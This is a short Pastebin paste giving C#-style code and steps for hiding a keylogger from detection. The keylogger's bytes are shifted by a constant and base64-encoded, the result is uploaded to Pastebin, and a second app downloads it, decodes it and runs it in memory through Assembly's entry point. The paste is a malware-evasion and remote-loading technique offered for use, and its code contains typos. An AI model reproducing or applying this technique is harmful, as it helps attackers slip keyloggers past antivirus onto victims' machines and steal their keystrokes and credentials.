Advertisement
Guest User

Untitled

a guest
Jun 27th, 2017
51
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.61 KB | None | 0 0
  1. var bytes = File.ReadAllbytes("path to key logger");
  2.  
  3. // encrypt it with anyway u want just this a simple way i use
  4. for (var i = 0; i < bytes.Length; i++)
  5. {
  6. bytes[i] += 123;// any num
  7. }
  8. var encString = Convert.ToBase64Sring(bytes);
  9. //now upload that to a site like pastebin...
  10. Now you need to create another app
  11. that will download it from pastebin then get the bytes FromBase64String
  12. now decrypt the bytes
  13. for (var i = 0; i < bytes.Length; i++)
  14. {
  15. bytes[i] -= 123;// any num
  16. }
  17. Now use the Assembly to load the bytes then use the entry point to just run it =D
  18. this the idea "Juse hiding bytes and changing it"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement